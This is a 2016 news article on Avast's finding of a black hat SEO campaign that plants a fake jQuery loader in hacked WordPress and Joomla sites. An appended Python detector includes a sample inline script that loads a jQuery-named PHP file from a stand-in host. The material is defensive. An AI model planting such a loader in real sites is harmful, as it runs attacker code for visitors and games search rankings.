Second black hat SEO campaign comes to light in the last 48h

Mar 31, 2016 00:15 GMT

Security researchers from Avast have brought to light a new black hat SEO campaign that loads malicious code in the form of a fake jQuery library on hacked WordPress and Joomla sites.

According to Avast's Alexej Savčin, the campaign begins when attackers compromise a website. The researcher doesn't explain how this happens but mentions that his company has seen this type of campaign target only WordPress and Joomla CMSs, which, if left unpatched, have been known to get hacked quite often in the past.

Once the website gets compromised, the crooks move on to adding malicious JavaScript code to each site's header section.

The crooks add only ten lines of code, which at first glance appear to load a version of the jQuery JavaScript library. The catch is that this "library" is actually a PHP file (jQuery.min.php) loaded from another previously compromised website.

Fake jQuery script used to inject links inside pages for black hat SEO

When a user accesses one of these compromised websites, this script executes after a ten-millisecond countdown and then injects links inside the page's source code.

These links point to various websites, which get a search rankings boost from having other sites link to them.

Avast says that its telemetry data shows that over 4.5 million users have accessed one of these hacked websites since November 2015, when the infection first came to light. The security firm also says that it detected over 70 million unique malicious files on the hacked servers, showing that the attackers didn't bother masking their infection or limiting it to only a few pages (as another recent black hat SEO campaign did).

Webmasters should be able to easily spot this infection if they take the time to look at their site's source code.
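One way to automate that source-code check is sketched below as an added example, not code from Avast or from the campaign: it flags any URL in a page whose file name looks like jQuery but ends in `.php`, and reports whether it sits in the header and points to a different host. The function name, host names and sample page are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Absolute or protocol-relative URL whose path ends in a jQuery-named .php file.
# Matches both <script src="..."> attributes and URLs built inside inline JavaScript.
FAKE_JQUERY = re.compile(
    r"""(?:https?:)?//[^\s"'<>()]+?/jquery[\w.\-]*\.php\b""", re.IGNORECASE)
HEAD = re.compile(r"<head\b.*?</head>", re.IGNORECASE | re.DOTALL)

def find_fake_jquery(html, site_host):
    """Return one finding per jQuery-named .php URL referenced in the page."""
    head = HEAD.search(html)
    head_start, head_end = head.span() if head else (-1, -1)
    findings = []
    for m in FAKE_JQUERY.finditer(html):
        url = m.group(0)
        absolute = "http:" + url if url.startswith("//") else url
        host = (urlsplit(absolute).hostname or "").lower()
        findings.append({
            "url": url,
            "line": html.count("\n", 0, m.start()) + 1,
            "in_head": head_start <= m.start() < head_end,
            "third_party": host != site_host.lower(),
        })
    return findings

# Constructed sample page: a legitimate local jQuery include plus an inline
# script that loads a jQuery-named PHP file from another host after 10 ms.
SAMPLE = """<html>
<head>
<script src="/wp-includes/js/jquery/jquery.js"></script>
<script>
setTimeout(function () {
  var s = document.createElement("script");
  s.src = "http://hacked-site.example/js/jQuery.min.php";
  document.head.appendChild(s);
}, 10);
</script>
</head>
<body><p>Hello</p></body>
</html>"""

if __name__ == "__main__":
    for f in find_fake_jquery(SAMPLE, "blog.example"):
        print(f)
```

Run it against the rendered HTML of several pages as well as the theme or template header files, since the injected code sits in the header of every page.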

Campaign activity for the last month